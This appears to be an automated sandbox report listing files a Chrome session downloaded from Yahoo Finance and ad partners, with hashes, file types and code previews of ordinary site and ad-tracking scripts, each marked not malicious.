                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3AF3264DBF5061D81C5A40DB797B517639A7B104F936B59D0CFB8084705319E7A9DB84238061F1F72AE691D521D8E977784C3238FCA7183B3F59598293661E61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/index.g5YcAAdQ.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{H as e,R as o}from"./control.CYgJF_JY.js";function i(r,t){throw new e(r,t)}function c(r,t){throw new o(r,t.toString())}new TextEncoder;export{i as e,c as r};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.106668500556004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHjVYuIfepp5bZIAdSbFS:H69mc4sl3O4jVJCepvNb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AE5FFB8B9F718200BEECE321B27C2494
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DF8746A5480120C715B1049C742DA6C7E1A7EEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:78D7CC5AC35882275B042C947BFFCF418BE0D5AA717E450C1DED37AE5E2B6DBF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A1ABD5E5FB5C6FD40E50F390D28B67DF3A1F284A8174436D8B7A13158FD35122EE0D8272867C1C288C54FC67B78B60D91EB334CA0D34F61B3A586B218F540AAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/expand_more.DscV4c36.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M16.59 8.59 12 13.17 7.41 8.59 6 10l6 6 6-6z"/></svg>';export{s as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (4356)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4357
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.372876566751865
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:nTUU6nYzvh+FFHfZb+JkeXXYjiU6qECF/vlj2X/vPjvvNlavBeGFbgctktPlY:n16ntHfukeXIP6qbF/vlj2X/vPjXHap7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:72EE4E559EB2DC17D66DD1874423EB86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F3A7B26FAE23933E7D33FEBCEBA7DA06B9455E10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:477FFA2EB1BC8E73A798FC1FD723A8890AB684FB40A44549611AAAFC3DDF8A3C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F2755AA4230E4164A662E0CFA31C3F07904EAD803561F545CBAE9C464C82129479B42D7A068C99C7DA6CD8119172831AAF74DA64A07CE48347140AB16635A102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/PortfolioSymbolCount.svelte_svelte_type_style_lang.n39zXuiY.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as U,p as M,k as h,n as E,i as f,y as W,e as S,t as d,d as C,f as k,h as m,q as y,l as p,m as b,N as _}from"./scheduler.Dsuh-FKt.js";import{S as X,i as Y}from"./index.CvwOawEI.js";import{ap as Z,aq as $,g as x,ar as ee,b as R,o as V,q as D,as as O,N as w}from"./commonUtil.BWwawKjd.js";function te(s){let e,t=s[8](s[3]||s[2])+"",r;return{c(){e=S("span"),r=d(t),this.h()},l(l){e=C(l,"SPAN",{class:!0});var n=k(e);r=m(n,t),n.forEach(f),this.h()},h(){y(e,"class","bold yf-1uof5l0")},m(l,n){h(l,e,n),p(e,r)},p(l,n){n&12&&t!==(t=l[8](l[3]||l[2])+"")&&b(r,t)},d(l){l&&f(e)}}}function le(s){let e,t=s[8](s[3]||s[2])+"",r,l;return{c(){e=S("fin-streamer"),r=d(t),this.h()},l(n){e=C(n,"FIN-STREAMER",{class:!0,"data-symbol":!0,"data-field":!0,"data-trend":!0,"data-template":!0,"data-value":!0,active:!0});var i=k(e);r=m(i,t),i.forEach(f),this.h()},h(){_(e,"class","price bold yf-1uof5l0"),_(e,"data-symbol",s[4]||s[5]),_(e,"data-field",l=s[0].id),_(e,"data-trend","none"),_(e,"data-template",`${s[7]}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.yieldmo.com/v000/sync?tdid=07c89b85-4c1c-424d-8df0-0123ed6cebb6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (8999)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):19034
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.37593292559394
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:hy0ZQ6GV4tv0lMGg2geQtZjD2ZFAsnO1W4YfhO5mk1GLQLhVQWwY4RXrqt:ckMtCGsfgyW4Yfkkk1GLQLhVQWwY4RXI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:712266E21158A6C5BA2A6FE2CDEDFD09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BE66B388711BDE2271E186B91C6C2F137A5CA0A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0BA5F83FD4ADECC216ECC2B5AEC01F6553F260CB0EB731069C7B416991F182FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:097E3CE528069FC62D8563E55F4B527BEC5F9E2FF5641D4975892EAD37CDAA384906CB8E6C9B8B01B2693A8DB883129D46553B691BECB1C1B9FEBE3FEF7D19AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://contextual.media.net/checksync.php?&usp_status=1&usp_consent=0&cs=2&cv=31&cid=8CU231JW5&https=1&itype=CM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"cmp_timeout":"","pbs_domain_regex":".*","csloggerUrl":"https:\/\/c21lg-d.media.net\/log?logid=kfk&evtid=cs&del=%3Cdel%3E&vsid=%3Cvsid%3E&origin=1&flt=0","optout":"mnet_optout","cslogger_host":"c21lg-d.media.net","ck_del_sld_tld":true,"gdpr":false,"gdprconsent":null,"cookieDeletionList":[],"ccpa":true,"ccpaconsent":"0","info":{"domain":".media.net","cid":"8CU231JW5","itype":"CM","pid":"8PRVCXX19","svr":"323","ll":0,"obpurge":false},"ckdel_reason":"2"};.window._mNCk=window._mNCk||{},function(t,e,n,r,o){"use strict";function i(t){return"function"==typeof t}function a(t){return"[object Array]"===Object.prototype.toString.call(t)}function u(t){switch(typeof t){case"string":return f(t)&&("1"===t||"true"===t);case"number":return 0!==t;case"boolean":return t;case"object":return null!==t;default:return!1}}function c(t){return f(t)?encodeURIComponent(t):""}function s(t){if(!f(t))return"";try{return decodeURI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (15557)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.211096750884003
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:sQTbeXlXVLzGQN94u9oqcydwhtKaIW0LpUsCROQHc2FwvYV62Bx56ezCwmvzwgJH:vYk62BexvdtnZC0n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:753CA81780B531EBF181A1319E8CF77A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2E955E9085AB2A1C6BCE4CDA4E1918C2C0197392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:058B13304B1E30C3568FCF34BE167C7C79F8810E0B8AD6D691AB88211D0404CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DE0D7A41829E96D9F19951484546F60DA92A0801C9D4AF57AAACE4D5B5BCD066AE822B7727B433DB0D93FFFB2F33D133B609387A8BDC74ECFF9AB9332C3D76FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Pt,e as zt,T as a,d as St,f as r,U as s,i as e,q as t,K as n,O as vt,L as Et,k as xt,l as i,n as wt}from"./scheduler.Dsuh-FKt.js";import{S as Nt,i as qt}from"./index.CvwOawEI.js";function Bt(X){let l,o,x,z,f,h,K,u,L,d,N,O,c,T,m,q,U,k,V,g,B,j,p,A,y,F,G,_,H,b,C,J,v,M,E,D,Q,w,R,P,Y;return{c(){l=zt("div"),o=a("svg"),x=a("g"),z=a("rect"),f=a("g"),h=a("g"),K=a("g"),u=a("path"),L=a("g"),d=a("path"),N=a("g"),O=a("g"),c=a("path"),T=a("g"),m=a("path"),q=a("g"),U=a("g"),k=a("path"),V=a("g"),g=a("path"),B=a("g"),j=a("g"),p=a("path"),A=a("g"),y=a("path"),F=a("g"),G=a("g"),_=a("path"),H=a("g"),b=a("path"),C=a("g"),J=a("g"),v=a("path"),M=a("g"),E=a("path"),D=a("g"),Q=a("g"),w=a("path"),R=a("g"),P=a("path"),this.h()},l(S){l=St(S,"DIV",{class:!0});var I=r(l);o=s(I,"svg",{width:!0,height:!0,"shape-rendering":!0,"text-rendering":!0,style:!0,viewBox:!0,xmlns:!0,role:!0,"aria-label":!0});var Z=r(o);x=s(Z,"g",{display:!0});var nt=r(x);z=s(nt,"rect",{width:!0,height:!0,fill:!0}),r(z).forEach(e),n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7126)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7127
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4824382191057275
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:gFNMYRsKEqNtZrN3GC53b8nI0ui1/qAqQlPQzo7gBYS3YhG:gFzRs36Wk3b8nI0uiYEf7EIU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:68DEF732914CEDD59F5CDF6383D15CC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D447694E2E527E72D12B4E1FF03537817A8ACBB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:289808B92709D4EFE7151F2AE6DE41EA3EDC17E63123A71ACAAFCA35E2ECDA37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E50A52B795E2CA706816CCCE9D8E1186914CFBC0FF5EFC7607B3D20F754C9152DB3B1CC6F5459C6427BAC46EA82EE7C37F604A52DD5EA21C2CA4FBB2CC981337
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as re,e as z,b as x,d as E,f as K,j as p,i as V,q as o,O as T,L as R,k as te,l as M,a4 as $,G as fe,I as he,Q as de}from"./scheduler.Dsuh-FKt.js";import{S as me,i as be,c as Ce,b as _e,m as we,t as ge,a as Se,d as ye}from"./index.CvwOawEI.js";import{t as D,g as G}from"./commonUtil.BWwawKjd.js";import{I as qe}from"./Icon.C8w5V9EK.js";import{g as Ae}from"./43.BgWy8GOF.js";import ke from"./search.D1DBxgNd.js";function ee(a){let n;return{c(){n=z("div"),this.h()},l(t){n=E(t,"DIV",{class:!0}),K(n).forEach(V),this.h()},h(){o(n,"class","finsrch-rslt finsrch-custom-rst finsrch-show-recomlst yf-cs8l6v"),R(n,"finsrch-show-ftr",a[11])},m(t,r){te(t,n,r)},p(t,r){r[0]&2048&&R(n,"finsrch-show-ftr",t[11])},d(t){t&&V(n)}}}function Te(a){let n,t,r,y,i,d,q,w,C,m,c,g,A;r=new qe({props:{size:a[9],icon:ke,type:a[10],className:"tw-absolute !tw-inline-flex tw-top-3 tw-left-3"}});let u=typeof a[12]!="function"&&ee(a);return{c(){n=z("div"),t=z("form"),Ce(r.$$.fragment),y=x(),i=z("input"),q=x(),u&&u.c(),
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (15735)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3538214812563885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:tjhokNAcq1IwoHp/AnzM9jD+3EQjXkrLMwH3Fom2xZ9T7zRar:NyIwW/AnzKDMEQTkrLMS3FxM9T7zRar
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:46EC7CD52EE9F5C1236B0DEA5072690A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CF9337DE42260986BA6EC460E64AB5120A3E5445
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:96398EA031F2FABAC614F2A0719722AC6D4C531AFBC38D48C86DABD17D4D2D7F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:84C8EA4CF4AEC794FAB79D1251396671D336CB275AF068C773B5F7A0BF40A867F58E1713DA8155E3CE5EB661F9FA65F6D7B1A2C47D4441798292BA2D1D4CA526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var e=window.wafer,t=e.base||{};function n(n,o){if(e)return o=o||{},e.utils.elementInView(n,o,t.viewport)}function o(e,t,n,o,i){return{clean:t,dest:n,h:i,metaSize:!0,pos:e,supports:!1,w:o}}var i={context:{bucket:"",bucketId:"",device:"",intl:"",lang:"",meta:{},mode:"normal",region:"",rid:"",site:""},i13n:{}},a=["MAST","LDRB"],s=function(){var e,t,s,r,l,c=window,d=document,f=c.adsConfig,u=c.YAHOO,v=void 0===u?i:u,p=c.DARLA,m=void 0===p?null:p,h=c.wafer,g={},b="adRotateEvt",w="scroll",E="homepage-viewer",C="sda-",L=C+"LREC4",A=C+"MON2",y="native-leaderboard-ad",x="gemini-ad-refresh",R=!1;function O(){var o;if(f&&(t=f.rotation)&&(null===(o=null==f?void 0:f.positions)||void 0===o?void 0:o[t.currentpos]))if(f.clientPositionMeta.positions.forEach((function(e){g[e.id]=e})),r=g[t.currentpos],m)if(t.enableNavAdRotation&&h.on("fetch:success",(function(e){e.elem.classList.contains("nextgen-page-navigation")&&function(e){var t=c._darlaAutoEvt;t||(t=m.evtSettings("AUTO")||{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (2498)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.9862606059286
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:U3OmAEdAPZMULQ25ikN3hyTIJTs33P0HV6R4GXruWDg:uSZpLQ2wc3MmVgyAruL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F93A67DB949AE2C2EADB7B0CF5FF1CF2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2FE24C96781039C92CE2B7A593CD76104A2F411D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:182864B4986EFBA29B554009E8E9DC9EE8BF292FB28CEC3FF5FDCA46ECAA44A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AB28D811C8BB847BA6526237163B41A1E7EDE52E87D52A5FD3246DB7723BAC873DB3B03795E43AA5D7FE40CA992EDA5BA43A0150519977FCEAA417847DD51F11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/headerUtil.DzYOGaFq.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as f,c as u}from"./commonUtil.BWwawKjd.js";import{l as V,f as y}from"./logUtil.CCV3qKPL.js";import{g}from"./i13nUtil.8E8_gCdn.js";function H(t){return typeof t=="string"?t:t.key}async function p(t,s){const{key:n,action:e,getComponent:a}=s;try{const[r,o]=await Promise.all([e(),typeof a=="function"?a().then(C=>C.default):Promise.resolve(void 0)]);return{key:n,action:e,getComponent:a,Component:o,error:!1,loading:!1,value:r}}catch(r){return V(t,{},{data:r,isCritical:!1,perfLabel:`loadLazy:${n}`}),{key:n,action:e,getComponent:a,error:!0,loading:!1}}}async function w(t,{action:s,getComponent:n,key:e,immediate:a=!1}){const[r,[o]]=await Promise.all([f(t),u(["lazy"],t)]),C=a||r.bot==="1"||r.mode==="failsafe",i={key:e,action:s,getComponent:n,loading:!0,error:!1};if(!C)return o.setEntry(e,i);const l=await p(t,i);return o.setEntry(e,l)}async function v(t,s){const n=H(s),[e]=await u(["lazy"],t),a=e.getEntry(n);if(!a||!a.loading)return a;const r=await p(t,a);return e.setEntry(n,r)}async fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7500)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.375999578555946
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:lBm2Xzzy8qhWuwRMExuJ7Mpzzy8qktuwRMEDAfAv4OYb4oi4nv2lQ40xTpginGn:C2jeHhWxME4J7M9eHktxMEDAfAvIUknq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1AF44F01C49F7CA0B685ED5718D41D62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:73E12A991AF0E8FB81BBDE74A6BAE531E3C172E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BC7085DC1698B1DB576024E0338C51D0FC8B5C1001A84EC3ED8E4F72B76C231A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:205B8A4A5A451623C7185082B1BBA0B39A317CA8CEC1F9453E7210F05DBC1C51D6D3A158AC0FC525622723C0E22956A0150A7B2BD882F614A0BA3F4C1F2299F4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/SectionHeader.NLJaoS9L.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Q,e as S,b as P,p as A,d as w,f as H,j as W,i as d,q as v,O as E,L as k,k as p,l as K,a5 as U,c as j,u as V,g as C,a as N,t as q,h as L,m as X}from"./scheduler.Dsuh-FKt.js";import{S as Y,i as Z,g as O,a as g,e as R,t as h,c as y,b as $,m as x,d as ee}from"./index.CvwOawEI.js";import{V as le}from"./ViewMoreLink.Bd590k7x.js";import{t as ie}from"./commonUtil.BWwawKjd.js";const se=f=>({}),B=f=>({}),ne=f=>({}),F=f=>({});function te(f){let e,l;const i=f[14].default,s=j(i,f,f[15],null),n=s||ae();return{c(){e=S("h2"),n&&n.c(),this.h()},l(t){e=w(t,"H2",{class:!0});var o=H(e);n&&n.l(o),o.forEach(d),this.h()},h(){v(e,"class","header yf-13lpgjv"),k(e,"ellipsis",f[10])},m(t,o){p(t,e,o),n&&n.m(e,null),l=!0},p(t,o){s&&s.p&&(!l||o&32768)&&V(s,i,t,t[15],l?N(i,t[15],o,null):C(t[15]),null),(!l||o&1024)&&k(e,"ellipsis",t[10])},i(t){l||(h(n,t),l=!0)},o(t){g(n,t),l=!1},d(t){t&&d(e),n&&n.d(t)}}}function fe(f){let e,l,i;const s=f[14].default,n=j(s,f,f[15],null),t=n||re();return{c(){e=S("h3"),t&&t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (852)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):853
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.225626342138373
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:K5ps3LgGLABPZ5/xrAboG9S1dfwlyAqrIMSR1Y9Ppvn:KTGLBEF/xrA0G9OAqrIl2vn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:ECB54AF9C3051A8A9E9792256E89CACB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:47C9819F0BECA5B81DE71FEDBD7085DACD0590F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7481F4F84E83774D38EF2EC0E07033DE63F3A018D527AEF73BD2E7AE635F8457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:95AD9B2FFF55C8CABE757AAFD9253045BF67C9DB274251338208CD14ADF43C6998DEFB150BB48E718842A58A7D74B82F539D1EA4B36F94BAFBA8F2A248339F8E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as o,e as c,d as u,f as h,i as d,q as n,L as f,k as g,n as r}from"./scheduler.Dsuh-FKt.js";import{S as _,i as I}from"./index.CvwOawEI.js";function w(t){let e,s;return{c(){e=c("div"),this.h()},l(a){e=u(a,"DIV",{class:!0,"data-testid":!0}),h(e).forEach(d),this.h()},h(){n(e,"class",s="loader "+t[0]+" "+t[2]+" "+t[1]+" yf-10mmfrb"),n(e,"data-testid","skeleton-loader"),f(e,"wideImg",t[2])},m(a,i){g(a,e,i)},p(a,[i]){i&7&&s!==(s="loader "+a[0]+" "+a[2]+" "+a[1]+" yf-10mmfrb")&&n(e,"class",s),i&7&&f(e,"wideImg",a[2])},i:r,o:r,d(a){a&&d(e)}}}function y(t,e,s){let{type:a="default"}=e,{className:i=""}=e,{wideImg:m=!1}=e;return t.$$set=l=>{"type"in l&&s(0,a=l.type),"className"in l&&s(1,i=l.className),"wideImg"in l&&s(2,m=l.wideImg)},[a,i,m]}class k extends _{constructor(e){super(),I(this,e,y,w,o,{type:0,className:1,wideImg:2})}}export{k as S};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.878987657706172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YWVKnSSKZPQSTRfZ5QSQcPZSwSEYLZSpGGOh1py2fmQMRonoIRfkKfbfqpC:YWUnMCSTHySBltGtG01U4VMOnRRfkKTV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C5E223895079F809E7825A832B0F910C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C599BDD260F18E58B0C1082D355DBBB619C3773F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:05D2821EB3CEB9832858FCED570939B0472D5D47BB63BFAD574BE885CDF3C66F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A62DEA35304E5E2E9042668C27FD7022DAF17BC3DFAB1ED1172EA45DE662E2EC09A795AFA8304A44A223CCCD654105890B8B2159BFF362B773EFE59169EA25DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://api-2-0.spot.im/v1.0.0/config/ab_test/sp_Rba9aFpG/INDEXYH101
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"spot_ab":"773:B|767:A|764:B|761:A|759:B|758:B|754:A|752:B|751:A|67:B|602:A|601:A|600:A|56:A|55:A|51:A|48:A|47:B|46:A|37:B|35:B|34:C|33:A|32:B|101:B|100:B|"}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (676)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):677
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.016237275679697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:JRarJUQrJkvOE4rJw3QR7HS0TcHWEcHbIk68+v++1cyNfCiSYqM:radUQdJHdw3QRD3c2Ec7IkP+GKcyNfCM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DB3BFFAC7FE1310EB604B40D9D75AA67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C6764B24225A76F70442E485DF899F019E39A7A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:250A8E32B679A0D246011D0AA78374EBB39B465E87902AC52D43B2976DBB80F8
